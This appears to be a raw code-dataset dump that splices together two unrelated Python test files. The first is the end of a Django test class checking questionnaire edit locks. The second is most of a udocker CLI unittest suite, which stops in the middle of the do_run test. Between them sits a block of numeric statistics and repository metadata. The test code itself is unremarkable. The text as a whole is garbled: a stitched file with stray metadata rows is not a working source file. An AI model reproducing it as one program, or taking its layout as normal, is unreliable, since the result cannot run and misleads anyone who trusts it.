response = QuestionnaireTestCase.client.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response,"Your questionnaire has been saved")
# log in as a new user
new_user = login(user="new-user", email="new-user@example.com", password="password")
# check we can't modify the questionnaire
response = new_user.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response,"Locked for editing")
def test_unlocked_questionnaire(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
questionnaire = Questionnaire.objects.get(questionnaire_id=3)
# lock the questionnaire
response = QuestionnaireTestCase.client.get(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
# add a question to questionnaire
response = QuestionnaireTestCase.client.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response, "Your questionnaire has been saved")
# log in as a new user
new_user = login(user="new-user", email="new-user@example.com", password="password")
# check we can't modify the questionnaire
response = new_user.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response, "Locked for editing")
# unlock the questionnaire
response = QuestionnaireTestCase.client.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), '{"unlock":"true"}', content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response, "Unlocked")
# check the new user can modify it now
response = new_user.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response, "Your questionnaire has been saved")
def test_user_cannot_unlock_another_users_questionnaire(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
questionnaire = Questionnaire.objects.get(questionnaire_id=3)
# lock the questionnaire
response = QuestionnaireTestCase.client.get(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
# add a question to questionnaire
response = QuestionnaireTestCase.client.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response, "Your questionnaire has been saved")
# log in as a new user
new_user = login(user="new-user", email="new-user@example.com", password="password")
# attempt to unlock the questionnaire
response = new_user.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), '{"unlock":"true"}', content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response, "Locked for editing")
| 63.669456
| 245
| 0.727344
| 1,705
| 15,217
| 6.369501
| 0.081525
| 0.062155
| 0.093462
| 0.047882
| 0.87523
| 0.865378
| 0.839595
| 0.823665
| 0.805157
| 0.805157
| 0
| 0.013051
| 0.154038
| 15,217
| 238
| 246
| 63.936975
| 0.830576
| 0.085365
| 0
| 0.640523
| 0
| 0
| 0.201643
| 0.060154
| 0
| 0
| 0
| 0
| 0.437909
| 1
| 0.091503
| false
| 0.026144
| 0.03268
| 0
| 0.130719
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9b988eee400cff0f310fb82b6ff36ab9c9ff0a5d
| 58,168
|
py
|
Python
|
tests/unit/test_cli.py
|
kellrott/udocker
|
16a16de21a24f93a01331359b91884f406342737
|
[
"Apache-2.0"
] | 963
|
2016-05-31T12:20:14.000Z
|
2022-03-29T17:52:10.000Z
|
tests/unit/test_cli.py
|
ericcurtin/udocker
|
87fb41cb5bcdb211d70f2b7f067c8e33d8959a1f
|
[
"Apache-2.0"
] | 212
|
2016-07-11T10:45:14.000Z
|
2022-03-05T08:13:38.000Z
|
tests/unit/test_cli.py
|
ericcurtin/udocker
|
87fb41cb5bcdb211d70f2b7f067c8e33d8959a1f
|
[
"Apache-2.0"
] | 124
|
2016-07-22T06:32:37.000Z
|
2022-02-25T23:55:48.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
udocker unit tests: UdockerCLI
"""
from unittest import TestCase, main
from unittest.mock import Mock, patch
from udocker.config import Config
from udocker.cmdparser import CmdParser
from udocker.cli import UdockerCLI
BUILTIN = "builtins"
BOPEN = BUILTIN + '.open'
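# BOPEN is the dotted path handed to unittest.mock.patch when a test needs to
# fake file access; a typical use (a sketch, not one of the tests below):
#
#   from unittest.mock import mock_open
#   with patch(BOPEN, mock_open(read_data='{"auth": "token"}')):
#       ...  # code under test calling open() now sees the fake file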
class UdockerCLITestCase(TestCase):
"""Test UdockerTestCase() command line interface."""
def setUp(self):
Config().getconf()
Config().conf['hostauth_list'] = ("/etc/passwd", "/etc/group")
Config().conf['cmd'] = "/bin/bash"
Config().conf['cpu_affinity_exec_tools'] = \
(["numactl", "-C", "%s", "--", ],
["taskset", "-c", "%s", ])
Config().conf['valid_host_env'] = "HOME"
Config().conf['username'] = "user"
Config().conf['userhome'] = "/"
Config().conf['oskernel'] = "4.8.13"
Config().conf['location'] = ""
Config().conf['keystore'] = "KEYSTORE"
str_local = 'udocker.container.localrepo.LocalRepository'
self.lrepo = patch(str_local)
self.local = self.lrepo.start()
self.mock_lrepo = Mock()
self.local.return_value = self.mock_lrepo
def tearDown(self):
self.lrepo.stop()
@patch('udocker.cli.LocalFileAPI')
@patch('udocker.cli.KeyStore')
@patch('udocker.cli.DockerIoAPI')
def test_01_init(self, mock_dioapi, mock_ks, mock_lfapi):
"""Test01 UdockerCLI() constructor."""
# Test Config().conf['keystore'] starts with /
Config().conf['keystore'] = "/xxx"
UdockerCLI(self.local)
self.assertTrue(mock_dioapi.called)
self.assertTrue(mock_lfapi.called)
self.assertTrue(mock_ks.called_with(Config().conf['keystore']))
# Test Config().conf['keystore'] does not start with /
Config().conf['keystore'] = "xx"
UdockerCLI(self.local)
self.assertTrue(mock_ks.called_with(Config().conf['keystore']))
@patch('udocker.cli.FileUtil.isdir')
def test_02__cdrepo(self, mock_isdir):
"""Test02 UdockerCLI()._cdrepo()."""
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc._cdrepo(cmdp)
self.assertFalse(status)
self.assertFalse(mock_isdir.called)
argv = ["udocker"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_isdir.return_value = False
udoc = UdockerCLI(self.local)
status = udoc._cdrepo(cmdp)
self.assertFalse(status)
self.assertTrue(mock_isdir.called)
argv = ["udocker"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_isdir.return_value = True
self.local.setup.return_value = None
udoc = UdockerCLI(self.local)
status = udoc._cdrepo(cmdp)
self.assertTrue(status)
self.assertTrue(self.local.setup.called)
@patch('udocker.cli.DockerIoAPI.is_repo_name')
@patch('udocker.cli.Msg')
def test_03__check_imagespec(self, mock_msg, mock_reponame):
"""Test03 UdockerCLI()._check_imagespec()."""
mock_msg.level = 0
mock_reponame.return_value = False
udoc = UdockerCLI(self.local)
status = udoc._check_imagespec("")
self.assertEqual(status, (None, None))
mock_reponame.return_value = True
udoc = UdockerCLI(self.local)
status = udoc._check_imagespec("AAA")
self.assertEqual(status, ("AAA", "latest"))
mock_reponame.return_value = True
udoc = UdockerCLI(self.local)
status = udoc._check_imagespec("AAA:45")
self.assertEqual(status, ("AAA", "45"))
@patch('udocker.cli.DockerIoAPI.is_repo_name')
@patch('udocker.cli.Msg')
def test_04__check_imagerepo(self, mock_msg, mock_reponame):
"""Test04 UdockerCLI()._check_imagerepo()."""
mock_msg.level = 0
mock_reponame.return_value = False
udoc = UdockerCLI(self.local)
status = udoc._check_imagerepo("")
self.assertEqual(status, None)
mock_reponame.return_value = True
udoc = UdockerCLI(self.local)
status = udoc._check_imagerepo("AAA")
self.assertEqual(status, "AAA")
@patch('udocker.cli.DockerIoAPI.set_index')
@patch('udocker.cli.DockerIoAPI.set_registry')
@patch('udocker.cli.DockerIoAPI.set_proxy')
@patch('udocker.cli.Msg')
def test_05__set_repository(self, mock_msg, mock_proxy,
mock_reg, mock_idx):
"""Test05 UdockerCLI()._set_repository()."""
mock_msg.level = 0
regist = "registry.io"
idxurl = "dockerhub.io"
imgrepo = "dockerhub.io/myimg:1.2"
mock_proxy.return_value = None
mock_reg.side_effect = [None, None, None, None]
mock_idx.side_effect = [None, None, None, None]
udoc = UdockerCLI(self.local)
status = udoc._set_repository(regist, idxurl, imgrepo, True)
self.assertTrue(status)
self.assertTrue(mock_proxy.called)
self.assertTrue(mock_reg.called)
self.assertTrue(mock_idx.called)
regist = ""
idxurl = ""
imgrepo = "https://dockerhub.io/myimg:1.2"
mock_proxy.return_value = None
mock_reg.side_effect = [None, None, None, None]
mock_idx.side_effect = [None, None, None, None]
udoc = UdockerCLI(self.local)
status = udoc._set_repository(regist, idxurl, imgrepo, False)
self.assertTrue(status)
def test_06__split_imagespec(self):
"""Test06 UdockerCLI()._split_imagespec()."""
imgrepo = ""
res = ("", "", "", "")
udoc = UdockerCLI(self.local)
status = udoc._split_imagespec(imgrepo)
self.assertEqual(status, res)
imgrepo = "dockerhub.io/myimg:1.2"
res = ("", "dockerhub.io", "myimg", "1.2")
udoc = UdockerCLI(self.local)
status = udoc._split_imagespec(imgrepo)
self.assertEqual(status, res)
imgrepo = "https://dockerhub.io/myimg:1.2"
res = ("https:", "dockerhub.io", "myimg", "1.2")
udoc = UdockerCLI(self.local)
status = udoc._split_imagespec(imgrepo)
self.assertEqual(status, res)
@patch('udocker.cli.os.path.exists')
@patch('udocker.cli.Msg')
def test_07_do_mkrepo(self, mock_msg, mock_exists):
"""Test07 UdockerCLI().do_mkrepo()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_exists.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_mkrepo(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_exists.called)
argv = ["udocker", "mkrepo"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_exists.return_value = False
self.local.setup.return_value = None
self.local.create_repo.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_mkrepo(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_exists.called)
self.assertTrue(self.local.setup.called)
self.assertTrue(self.local.create_repo.called)
argv = ["udocker", "mkrepo"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_exists.return_value = False
self.local.setup.return_value = None
self.local.create_repo.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_mkrepo(cmdp)
self.assertEqual(status, 0)
# def test_08__search_print_lines(self):
# """Test08 UdockerCLI()._search_print_lines()."""
# @patch('udocker.cli.DockerIoAPI.search_get_page')
# @patch('udocker.cli.HostInfo.termsize')
# def test_09__search_repositories(self, mock_termsz, mock_doiasearch):
# """Test09 UdockerCLI()._search_repositories()."""
# repo_list = [{"count": 1, "next": "", "previous": "",
# "results": [
# {
# "repo_name": "lipcomputing/ipyrad",
# "short_description": "Docker to run ipyrad",
# "star_count": 0,
# "pull_count": 188,
# "repo_owner": "",
# "is_automated": True,
# "is_official": False
# }]}]
# mock_termsz.return_value = (40, "")
# mock_doiasearch.return_value = repo_list
# udoc = UdockerCLI(self.local)
# status = udoc._search_repositories("ipyrad")
# self.assertEqual(status, 0)
@patch('udocker.cli.DockerIoAPI.get_tags')
def test_10__list_tags(self, mock_gettags):
"""Test10 UdockerCLI()._list_tags()."""
mock_gettags.return_value = ["t1"]
udoc = UdockerCLI(self.local)
status = udoc._list_tags("t1")
self.assertEqual(status, 0)
mock_gettags.return_value = None
udoc = UdockerCLI(self.local)
status = udoc._list_tags("t1")
self.assertEqual(status, 1)
@patch('udocker.cli.KeyStore.get')
@patch('udocker.cli.DockerIoAPI.set_v2_login_token')
@patch('udocker.cli.DockerIoAPI.search_init')
@patch.object(UdockerCLI, '_search_repositories')
@patch.object(UdockerCLI, '_list_tags')
@patch.object(UdockerCLI, '_split_imagespec')
@patch.object(UdockerCLI, '_set_repository')
def test_11_do_search(self, mock_setrepo, mock_split, mock_listtags,
mock_searchrepo, mock_doiasearch, mock_doiasetv2,
mock_ksget):
"""Test11 UdockerCLI().do_search()."""
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_search(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "search", "--list-tags", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_setrepo.return_value = None
mock_split.return_value = ("d1", "d2", "ipyrad", "d3")
mock_doiasearch.return_value = None
mock_ksget.return_value = "v2token1"
mock_doiasetv2.return_value = None
mock_listtags.return_value = ["t1", "t2"]
udoc = UdockerCLI(self.local)
status = udoc.do_search(cmdp)
self.assertEqual(status, ["t1", "t2"])
self.assertTrue(mock_setrepo.called)
self.assertTrue(mock_doiasearch.called)
self.assertTrue(mock_ksget.called)
self.assertTrue(mock_doiasetv2.called)
self.assertTrue(mock_listtags.called)
argv = ["udocker", "search", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_setrepo.return_value = None
mock_split.return_value = ("d1", "d2", "ipyrad", "d3")
mock_doiasearch.return_value = None
mock_ksget.return_value = "v2token1"
mock_doiasetv2.return_value = None
mock_searchrepo.return_value = 0
udoc = UdockerCLI(self.local)
status = udoc.do_search(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_searchrepo.called)
@patch('udocker.cli.Msg')
@patch('udocker.cli.LocalFileAPI.load')
@patch.object(UdockerCLI, '_check_imagerepo')
def test_12_do_load(self, mock_chkimg, mock_load, mock_msg):
"""Test12 UdockerCLI().do_load()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_load(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "load", "-i", "ipyrad", "ipyimg"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_load(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_load.called)
argv = ["udocker", "load", "-i", "ipyrad", "ipyimg"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = True
mock_load.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_load(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_load.called)
argv = ["udocker", "load", "-i", "ipyrad", "ipyimg"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = True
mock_load.return_value = ['docker-repo1', 'docker-repo2']
udoc = UdockerCLI(self.local)
status = udoc.do_load(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.Msg')
@patch('udocker.cli.os.path.exists')
@patch('udocker.cli.LocalFileAPI.save')
@patch.object(UdockerCLI, '_check_imagespec')
def test_13_do_save(self, mock_chkimg, mock_save, mock_exists, mock_msg):
"""Test13 UdockerCLI().do_save()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_save(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "save", "-o", "ipyrad", "ipyimg:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_exists.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_save(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_exists.called)
self.assertFalse(mock_chkimg.called)
self.assertFalse(mock_save.called)
argv = ["udocker", "save", "-o", "ipyrad", "ipyimg:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_exists.return_value = False
mock_chkimg.return_value = ("ipyimg", "latest")
mock_save.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_save(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_save.called)
argv = ["udocker", "save", "-o", "ipyrad", "ipyimg:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_exists.return_value = False
mock_chkimg.return_value = ("ipyimg", "latest")
mock_save.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_save(cmdp)
self.assertTrue(mock_exists.called)
self.assertTrue(mock_chkimg.called)
self.assertTrue(mock_save.called)
self.assertEqual(status, 0)
@patch('udocker.cli.LocalFileAPI.import_toimage')
@patch('udocker.cli.LocalFileAPI.import_tocontainer')
@patch('udocker.cli.LocalFileAPI.import_clone')
@patch('udocker.cli.Msg')
@patch.object(UdockerCLI, '_check_imagespec')
def test_14_do_import(self, mock_chkimg, mock_msg, mock_impclone,
mock_impcont, mock_impimg):
"""Test14 UdockerCLI().do_import()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_import(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_chkimg.called)
self.assertFalse(mock_impclone.called)
self.assertFalse(mock_impcont.called)
self.assertFalse(mock_impimg.called)
argv = ["udocker", "import", "ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_import(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_chkimg.called)
self.assertFalse(mock_impimg.called)
argv = ["udocker", "import", "ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_import(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_chkimg.called)
self.assertTrue(mock_impimg.called)
argv = ["udocker", "import", "--clone", "ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
mock_impclone.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_import(cmdp)
self.assertEqual(status, 0)
self.assertFalse(mock_impcont.called)
self.assertTrue(mock_impclone.called)
argv = ["udocker", "import", "--tocontainer",
"ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
mock_impcont.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_import(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_impcont.called)
@patch('udocker.cli.Msg')
@patch('udocker.cli.ContainerStructure')
def test_15_do_export(self, mock_cs, mock_msg):
"""Test15 UdockerCLI().do_export()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_export(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "export", "-o", "ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = ""
udoc = UdockerCLI(self.local)
status = udoc.do_export(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "export", "-o", "ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_cs.return_value.export_tofile.return_value = False
self.local.get_container_id.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_export(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_cs.called)
self.assertTrue(self.local.get_container_id.called)
argv = ["udocker", "export", "-o", "ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_cs.return_value.export_tofile.return_value = True
self.local.get_container_id.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_export(cmdp)
self.assertEqual(status, 0)
argv = ["udocker", "export",
"--clone", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_cs.return_value.clone_tofile.return_value = True
self.local.get_container_id.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_export(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.LocalFileAPI.clone_container')
@patch('udocker.cli.Msg')
def test_16_do_clone(self, mock_msg, mock_clone):
"""Test16 UdockerCLI().do_clone()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_clone(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "clone", "ipyradcont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = ""
udoc = UdockerCLI(self.local)
status = udoc.do_clone(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_clone.called)
self.assertTrue(self.local.get_container_id.called)
argv = ["udocker", "clone", "ipyradcont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = "12345"
mock_clone.return_value = "54321"
udoc = UdockerCLI(self.local)
status = udoc.do_clone(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_clone.called)
@patch('udocker.cli.Msg')
@patch('udocker.cli.KeyStore.put')
@patch('udocker.cli.DockerIoAPI.get_v2_login_token')
@patch.object(UdockerCLI, '_set_repository')
def test_17_do_login(self, mock_setrepo, mock_dioalog,
mock_ksput, mock_msg):
"""Test17 UdockerCLI().do_login()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_login(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "login", "--username", "u1",
"--password", "xx"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_setrepo.return_value = True
mock_dioalog.return_value = "zx1"
mock_ksput.return_value = 1
udoc = UdockerCLI(self.local)
status = udoc.do_login(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_setrepo.called)
self.assertTrue(mock_dioalog.called)
self.assertTrue(mock_ksput.called)
argv = ["udocker", "login", "--username", "u1",
"--password", "xx"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_setrepo.return_value = None
mock_dioalog.return_value = "zx1"
mock_ksput.return_value = 0
udoc = UdockerCLI(self.local)
status = udoc.do_login(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_setrepo.called)
self.assertTrue(mock_dioalog.called)
self.assertTrue(mock_ksput.called)
@patch('udocker.cli.Msg')
@patch('udocker.cli.KeyStore')
@patch.object(UdockerCLI, '_set_repository')
def test_18_do_logout(self, mock_setrepo, mock_ks, mock_msg):
"""Test18 UdockerCLI().do_logout()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_logout(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "logout", "-a"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_setrepo.return_value = None
mock_ks.return_value.erase.return_value = 0
udoc = UdockerCLI(self.local)
status = udoc.do_logout(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_setrepo.called)
self.assertTrue(mock_ks.return_value.erase.called)
argv = ["udocker", "logout"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_setrepo.return_value = None
mock_ks.return_value.delete.return_value = 1
udoc = UdockerCLI(self.local)
status = udoc.do_logout(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_setrepo.called)
self.assertTrue(mock_ks.return_value.delete.called)
@patch.object(UdockerCLI, '_set_repository')
@patch.object(UdockerCLI, '_check_imagespec')
@patch('udocker.cli.DockerIoAPI')
@patch('udocker.cli.KeyStore.get')
@patch('udocker.cli.Msg')
def test_19_do_pull(self, mock_msg, mock_ksget, mock_dioa,
mock_chkimg, mock_setrepo):
"""Test19 UdockerCLI().do_pull()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_pull(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "pull", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
mock_setrepo.return_value = None
mock_ksget.return_value = "zx1"
mock_dioa.return_value.set_v2_login_token.return_value = None
mock_dioa.return_value.get.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_pull(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_chkimg.called)
self.assertTrue(mock_setrepo.called)
self.assertTrue(mock_ksget.called)
self.assertTrue(mock_dioa.return_value.set_v2_login_token.called)
self.assertTrue(mock_dioa.return_value.get.called)
argv = ["udocker", "pull", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
mock_setrepo.return_value = None
mock_ksget.return_value = "zx1"
mock_dioa.return_value.set_v2_login_token.return_value = None
mock_dioa.return_value.get.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_pull(cmdp)
self.assertEqual(status, 0)
@patch.object(UdockerCLI, '_check_imagespec')
@patch('udocker.cli.ContainerStructure')
@patch('udocker.cli.DockerIoAPI')
@patch('udocker.cli.Msg')
def test_20__create(self, mock_msg, mock_dioapi,
mock_cstruct, mock_chkimg):
"""Test20 UdockerCLI()._create()."""
mock_msg.level = 0
mock_dioapi.return_value.is_repo_name.return_value = False
udoc = UdockerCLI(self.local)
status = udoc._create("IMAGE:TAG")
self.assertFalse(status)
self.assertTrue(mock_msg.return_value.err.called)
mock_dioapi.return_value.is_repo_name.return_value = True
mock_chkimg.return_value = ("", "TAG")
mock_cstruct.return_value.create.return_value = True
udoc = UdockerCLI(self.local)
status = udoc._create("IMAGE:TAG")
self.assertFalse(status)
mock_dioapi.return_value.is_repo_name.return_value = True
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_cstruct.return_value.create.return_value = True
udoc = UdockerCLI(self.local)
status = udoc._create("IMAGE:TAG")
self.assertTrue(status)
@patch.object(UdockerCLI, '_create')
@patch('udocker.cli.Msg')
def test_21_do_create(self, mock_msg, mock_create):
"""Test21 UdockerCLI().do_create()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_create(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_create.called)
argv = ["udocker", "create", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_create.return_value = ""
udoc = UdockerCLI(self.local)
status = udoc.do_create(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_create.called)
argv = ["udocker", "create", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_create.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_create(cmdp)
self.assertEqual(status, 0)
self.assertFalse(self.local.set_container_name.called)
argv = ["udocker", "create", "--name=mycont", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_create.return_value = "12345"
self.local.set_container_name.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_create(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.set_container_name.called)
# def test_22__get_run_options(self):
# """Test22 UdockerCLI()._get_run_options()"""
@patch('udocker.cli.ExecutionMode')
@patch('udocker.cli.Msg')
@patch.object(UdockerCLI, 'do_pull')
@patch.object(UdockerCLI, '_create')
@patch.object(UdockerCLI, '_check_imagespec')
def test_23_do_run(self, mock_chkimg, mock_create, mock_pull,
mock_msg, mock_exec):
"""Test23 UdockerCLI().do_run()."""
mock_msg.level = 0
mock_pull.return_value = None
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_run(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "run"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_pull.return_value = None
udoc = UdockerCLI(self.local)
status = udoc.do_run(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "run", "--location=/tmp/udocker", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_pull.return_value = None
mock_exec.return_value.get_engine.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_run(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_exec.return_value.get_engine.called)
mock_pull.return_value = None
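# PRootEngine is patched manually (start()/stop()) instead of with a
# decorator so the same mocked engine can be reused across the
# remaining run scenarios; exeng_patch.stop() below undoes it.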
